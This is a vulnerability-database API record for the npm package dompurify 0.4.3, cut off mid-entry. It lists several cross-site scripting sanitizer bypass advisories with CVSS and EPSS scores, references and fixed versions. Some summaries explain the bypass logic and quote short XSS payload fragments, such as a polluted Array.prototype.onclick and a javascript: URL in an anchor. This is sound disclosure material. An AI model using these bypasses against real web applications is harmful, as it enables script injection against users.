{"url":"http://public2.vulnerablecode.io/api/packages/447249?format=json","purl":"pkg:npm/dompurify@0.4.3","type":"npm","namespace":"","name":"dompurify","version":"0.4.3","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"3.4.0","latest_non_vulnerable_version":"3.4.5","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/359925?format=json","vulnerability_id":"VCID-37xc-54fs-8fh6","summary":"DOMPurify's ADD_TAGS function form bypasses FORBID_TAGS due to short-circuit evaluation\n## Summary\nIn `src/purify.ts:1117-1123`, `ADD_TAGS` as a function (via `EXTRA_ELEMENT_HANDLING.tagCheck`) bypasses `FORBID_TAGS` due to short-circuit evaluation.\n\nThe condition:\n```\n!(tagCheck(tagName)) && (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName])\n```\nWhen `tagCheck(tagName)` returns `true`, the entire condition is `false` and the element is kept — `FORBID_TAGS[tagName]` is never evaluated.\n\n## Inconsistency\nThis contradicts the attribute-side pattern at line 1214 where `FORBID_ATTR` explicitly wins first:\n```\nif (FORBID_ATTR[lcName]) { continue; }\n```\nFor tags, FORBID should also take precedence over ADD.\n\n## Impact\nApplications using both `ADD_TAGS` as a function and `FORBID_TAGS` simultaneously get unexpected behavior — forbidden tags are allowed through. Config-dependent but a genuine logic inconsistency.\n\n## Suggested Fix\nCheck `FORBID_TAGS` before `tagCheck`:\n```\nif (FORBID_TAGS[tagName]) { /* remove */ }\nelse if (tagCheck(tagName) || ALLOWED_TAGS[tagName]) { /* keep */ }\n```\n\n## Affected Version\nv3.3.3 (commit 883ac15)","references":[{"reference_url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-39q2-94rc-95cp","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-39q2-94rc-95cp"},{"reference_url":"https://github.com/advisories/GHSA-39q2-94rc-95cp","reference_id":"GHSA-39q2-94rc-95cp","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-39q2-94rc-95cp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373307?format=json","purl":"pkg:npm/dompurify@3.4.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.4.0"}],"aliases":["GHSA-39q2-94rc-95cp"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-37xc-54fs-8fh6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/81082?format=json","vulnerability_id":"VCID-3fxk-2qcb-jfa3","summary":"DOMPurify is a DOM-only cross-site scripting sanitizer for HTML, MathML, and SVG. Versions prior to 3.4.0 have an inconsistency between FORBID_TAGS and FORBID_ATTR handling when function-based ADD_TAGS is used. Commit c361baa added an early exit for FORBID_ATTR at line 1214. The same fix was not applied to FORBID_TAGS. At line 1118-1123, when EXTRA_ELEMENT_HANDLING.tagCheck returns true, the short-circuit evaluation skips the FORBID_TAGS check entirely. This allows forbidden elements to survive sanitization with their attributes intact. Version 3.4.0 patches the issue.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-41240.json","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-41240.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41240","reference_id":"","reference_type":"","scores":[{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04347","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04346","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04355","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00017","scoring_system":"epss","scoring_elements":"0.04359","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41240"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41240","reference_id":"","reference_type":"","scores":[{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41240"},{"reference_url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134892","reference_id":"1134892","reference_type":"","scores":[],"url":"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1134892"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461147","reference_id":"2461147","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2461147"},{"reference_url":"https://github.com/cure53/DOMPurify/releases/tag/3.4.0","reference_id":"3.4.0","reference_type":"","scores":[{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T17:21:26Z/"}],"url":"https://github.com/cure53/DOMPurify/releases/tag/3.4.0"},{"reference_url":"https://github.com/cure53/DOMPurify/commit/c361baa18dbdcb3344a41110f4c48ad85bf48f80","reference_id":"c361baa18dbdcb3344a41110f4c48ad85bf48f80","reference_type":"","scores":[{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T17:21:26Z/"}],"url":"https://github.com/cure53/DOMPurify/commit/c361baa18dbdcb3344a41110f4c48ad85bf48f80"},{"reference_url":"https://github.com/advisories/GHSA-h7mw-gpvr-xq4m","reference_id":"GHSA-h7mw-gpvr-xq4m","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h7mw-gpvr-xq4m"},{"reference_url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-h7mw-gpvr-xq4m","reference_id":"GHSA-h7mw-gpvr-xq4m","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"6.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T17:21:26Z/"}],"url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-h7mw-gpvr-xq4m"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:16476","reference_id":"RHSA-2026:16476","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:16476"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:21338","reference_id":"RHSA-2026:21338","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:21338"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:21772","reference_id":"RHSA-2026:21772","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:21772"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:22619","reference_id":"RHSA-2026:22619","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:22619"},{"reference_url":"https://access.redhat.com/errata/RHSA-2026:24977","reference_id":"RHSA-2026:24977","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2026:24977"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373307?format=json","purl":"pkg:npm/dompurify@3.4.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.4.0"}],"aliases":["CVE-2026-41240","GHSA-h7mw-gpvr-xq4m"],"risk_score":3.6,"exploitability":"0.5","weighted_severity":"7.3","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3fxk-2qcb-jfa3"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/40257?format=json","vulnerability_id":"VCID-56ww-dvtp-8uc2","summary":"DOMPurify is a DOM-only, super-fast, uber-tolerant XSS sanitizer for HTML, MathML and SVG. It has been discovered that malicious HTML using special nesting techniques can bypass the depth checking added to DOMPurify in recent releases. It was also possible to use Prototype Pollution to weaken the depth check. This renders dompurify unable to avoid cross site scripting (XSS) attacks. This issue has been addressed in versions 2.5.4 and 3.1.3 of DOMPurify. All users are advised to upgrade. There are no known workarounds for this vulnerability.","references":[{"reference_url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-45801.json","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv3","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L"}],"url":"https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-45801.json"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-45801","reference_id":"","reference_type":"","scores":[{"value":"0.00096","scoring_system":"epss","scoring_elements":"0.26786","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00096","scoring_system":"epss","scoring_elements":"0.26788","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00096","scoring_system":"epss","scoring_elements":"0.26802","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00096","scoring_system":"epss","scoring_elements":"0.26586","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-45801"},{"reference_url":"https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21","reference_id":"1e520262bf4c66b5efda49e2316d6d1246ca7b21","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-16T20:04:30Z/"}],"url":"https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21"},{"reference_url":"https://bugzilla.redhat.com/show_bug.cgi?id=2312631","reference_id":"2312631","reference_type":"","scores":[],"url":"https://bugzilla.redhat.com/show_bug.cgi?id=2312631"},{"reference_url":"https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc","reference_id":"26e1d69ca7f769f5c558619d644d90dd8bf26ebc","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-16T20:04:30Z/"}],"url":"https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-45801","reference_id":"CVE-2024-45801","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-45801"},{"reference_url":"https://github.com/advisories/GHSA-mmhx-hmjr-r674","reference_id":"GHSA-mmhx-hmjr-r674","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-mmhx-hmjr-r674"},{"reference_url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674","reference_id":"GHSA-mmhx-hmjr-r674","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L"},{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-16T20:04:30Z/"}],"url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:10762","reference_id":"RHSA-2024:10762","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:10762"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:11381","reference_id":"RHSA-2024:11381","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:11381"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:7324","reference_id":"RHSA-2024:7324","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:7324"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:7706","reference_id":"RHSA-2024:7706","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:7706"},{"reference_url":"https://access.redhat.com/errata/RHSA-2024:8014","reference_id":"RHSA-2024:8014","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2024:8014"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:0892","reference_id":"RHSA-2025:0892","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:0892"},{"reference_url":"https://access.redhat.com/errata/RHSA-2025:4019","reference_id":"RHSA-2025:4019","reference_type":"","scores":[],"url":"https://access.redhat.com/errata/RHSA-2025:4019"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/33397?format=json","purl":"pkg:npm/dompurify@2.5.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-77rz-yewt-77cq"},{"vulnerability":"VCID-8tpw-rcyz-xuhu"},{"vulnerability":"VCID-cmrb-k5pw-vffn"},{"vulnerability":"VCID-cv62-a95x-9uhe"},{"vulnerability":"VCID-jnpe-6ax6-zubr"},{"vulnerability":"VCID-r6b8-q386-3ken"},{"vulnerability":"VCID-zaud-3sc4-ykcg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@2.5.4"},{"url":"http://public2.vulnerablecode.io/api/packages/33396?format=json","purl":"pkg:npm/dompurify@3.1.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-77rz-yewt-77cq"},{"vulnerability":"VCID-8d4n-d1dh-4fe9"},{"vulnerability":"VCID-8tpw-rcyz-xuhu"},{"vulnerability":"VCID-cmrb-k5pw-vffn"},{"vulnerability":"VCID-cv62-a95x-9uhe"},{"vulnerability":"VCID-jnpe-6ax6-zubr"},{"vulnerability":"VCID-r6b8-q386-3ken"},{"vulnerability":"VCID-zaud-3sc4-ykcg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.1.3"}],"aliases":["CVE-2024-45801","GHSA-mmhx-hmjr-r674"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-56ww-dvtp-8uc2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/359958?format=json","vulnerability_id":"VCID-77rz-yewt-77cq","summary":"DOMPurify USE_PROFILES prototype pollution allows event handlers\n## Summary\nWhen `USE_PROFILES` is enabled, DOMPurify rebuilds `ALLOWED_ATTR` as a plain array before populating it with the requested allowlists. Because the sanitizer still looks up attributes via `ALLOWED_ATTR[lcName]`, any `Array.prototype` property that is polluted also counts as an allowlisted attribute. An attacker who can set `Array.prototype.onclick = true` (or a runtime already subject to prototype pollution) can thus force DOMPurify to keep event handlers such as `onclick` even when they are normally forbidden. The provided PoC sanitizes `<img onclick=...>` with `USE_PROFILES` and adds the sanitized output to the DOM; the polluted prototype allows the event handler to survive and execute, turning what should be a blocklist into a silent XSS vector.\n\n## Impact\nPrototype pollution makes DOMPurify accept dangerous event handler attributes, which bypasses the sanitizer and results in DOM-based XSS once the sanitized markup is rendered.\n\n## Credits\nIdentified by Cantina’s Apex (https://www.cantina.security).","references":[{"reference_url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-cj63-jhhr-wcxv","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-cj63-jhhr-wcxv"},{"reference_url":"https://github.com/advisories/GHSA-cj63-jhhr-wcxv","reference_id":"GHSA-cj63-jhhr-wcxv","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cj63-jhhr-wcxv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/40110?format=json","purl":"pkg:npm/dompurify@3.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-8d4n-d1dh-4fe9"},{"vulnerability":"VCID-cmrb-k5pw-vffn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.3.2"}],"aliases":["GHSA-cj63-jhhr-wcxv"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-77rz-yewt-77cq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/359752?format=json","vulnerability_id":"VCID-8tpw-rcyz-xuhu","summary":"DOMPurify ADD_ATTR predicate skips URI validation\n## Summary\nDOMPurify allows `ADD_ATTR` to be provided as a predicate function via `EXTRA_ELEMENT_HANDLING.attributeCheck`. When the predicate returns `true`, `_isValidAttribute` short-circuits the attribute check before URI-safe validation runs. An attacker who supplies a predicate that accepts specific attribute/tag combinations can then sanitize input such as `<a href=\"javascript:alert(document.domain)\">` and have the `javascript:` URL survive, because URI validation is skipped for that attribute while other checks still pass. The provided PoC accepts `href` for anchors and then triggers a click inside an iframe, showing that the sanitized payload executes despite the protocol bypass.\n\n## Impact\nPredicate-based allowlisting bypasses DOMPurify's URI validation, allowing unsafe protocols such as `javascript:` to reach the DOM and execute whenever the link is activated, resulting in DOM-based XSS.\n\n## Credits\nIdentified by Cantina’s Apex (https://www.cantina.security).","references":[{"reference_url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-cjmm-f4jc-qw8r","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/cure53/DOMPurify/security/advisories/GHSA-cjmm-f4jc-qw8r"},{"reference_url":"https://github.com/advisories/GHSA-cjmm-f4jc-qw8r","reference_id":"GHSA-cjmm-f4jc-qw8r","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-cjmm-f4jc-qw8r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/40110?format=json","purl":"pkg:npm/dompurify@3.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-8d4n-d1dh-4fe9"},{"vulnerability":"VCID-cmrb-k5pw-vffn"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@3.3.2"}],"aliases":["GHSA-cjmm-f4jc-qw8r"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8tpw-rcyz-xuhu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/161221?format=json","vulnerability_id":"VCID-fp9d-g1ya-qyfx","summary":"DOMPurify before 1.0.11 allows reverse tabnabbing in demos/hooks-target-blank-demo.html because links lack a 'rel=\"noopener noreferrer\"' attribute.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-25155","reference_id":"","reference_type":"","scores":[{"value":"0.00242","scoring_system":"epss","scoring_elements":"0.47882","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00242","scoring_system":"epss","scoring_elements":"0.47897","published_at":"2026-06-13T12:55:00Z"},{"value":"0.00242","scoring_system":"epss","scoring_elements":"0.4774","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00242","scoring_system":"epss","scoring_elements":"0.47881","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-25155"},{"reference_url":"https://github.com/cure53/DOMPurify/commit/7601c33a57e029cce51d910eda5179a3f1b51c83","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/cure53/DOMPurify/commit/7601c33a57e029cce51d910eda5179a3f1b51c83"},{"reference_url":"https://github.com/cure53/DOMPurify/pull/337","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/cure53/DOMPurify/pull/337"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-25155","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-25155"},{"reference_url":"https://github.com/cure53/DOMPurify/compare/1.0.10...1.0.11","reference_id":"1.0.10...1.0.11","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T18:24:04Z/"}],"url":"https://github.com/cure53/DOMPurify/compare/1.0.10...1.0.11"},{"reference_url":"https://github.com/cure53/DOMPurify/pull/337/files","reference_id":"files","reference_type":"","scores":[{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-06T18:24:04Z/"}],"url":"https://github.com/cure53/DOMPurify/pull/337/files"},{"reference_url":"https://github.com/advisories/GHSA-8hgg-xxm5-3873","reference_id":"GHSA-8hgg-xxm5-3873","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8hgg-xxm5-3873"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/381252?format=json","purl":"pkg:npm/dompurify@1.0.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-37xc-54fs-8fh6"},{"vulnerability":"VCID-3fxk-2qcb-jfa3"},{"vulnerability":"VCID-56ww-dvtp-8uc2"},{"vulnerability":"VCID-77rz-yewt-77cq"},{"vulnerability":"VCID-8tpw-rcyz-xuhu"},{"vulnerability":"VCID-cmrb-k5pw-vffn"},{"vulnerability":"VCID-gbb5-2vbk-suh8"},{"vulnerability":"VCID-gzpp-fw72-57hu"},{"vulnerability":"VCID-jnpe-6ax6-zubr"},{"vulnerability":"VCID-nz3k-udjb-3fhz"},{"vulnerability":"VCID-wmjr-1h3n-hbhb"},{"vulnerability":"VCID-z8n7-dz6p-zqfb"},{"vulnerability":"VCID-zaud-3sc4-ykcg"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/dompurify@1.0.11"}],"aliases":["CVE-2019-25155","GHSA-8hgg-xxm5-3873"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-fp9d-g1ya-qyfx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/205198?format=json","vulnerability_id":"VCID-gbb5-2vbk-suh8","summary":"Cross-Site Scripting in dompurify","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-16728","reference_id":"","reference_type":"","scores":[{"value":"0.00962","scoring_system":"epss","scoring_elements":"0.77002","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00962","scoring_system":"epss","scoring_elements":"0.7693","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00962","scoring_system":"epss","scoring_elements":"0.7701","published_at":"2026-06-14T12:55:00Z"},{"value":"0.00962","scoring_system":"epss","scoring_elements":"0.77017","published_at":"2026-06-13T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-16728"},{"reference_url":"https://lists.debian.org/debian-lts-announce/2020/10/msg00029.html","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.debian.org/debian-lts-announce/2020/10/msg00029.html"},{"reference_url":"https://research.securitum.com/dompurify-bypass-using-mxss","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://research.securitum.com/dompurify-bypass-using-mxss"},{"reference_url":"https://research.securitum.com/dompurify-bypass-using-mxss/","reference_id":"","reference_type":"","scores":[],"url":"https://research.securitum.com/dompurify-bypass-using-mxss/"},{"reference_url":"https